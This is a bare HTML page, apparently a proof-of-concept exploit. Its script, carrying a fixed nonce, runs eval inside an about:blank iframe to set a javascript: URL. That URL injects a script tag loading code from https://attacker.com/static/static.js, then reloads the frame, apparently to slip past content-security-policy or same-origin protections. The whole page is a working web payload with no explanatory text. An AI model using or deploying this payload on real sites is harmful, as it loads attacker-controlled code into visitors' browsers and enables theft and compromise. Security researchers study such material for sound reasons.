<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGSnHALGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGSnHALGGGGG.onload=_=>GGGGGSnHALGGGGG.contentWindow.eval("location='javascript:var o=document.createElement(`script`);o.src=`https://attacker.com/static/static.js`;document.body.appendChild(o);void(0);'");GGGGGSnHALGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>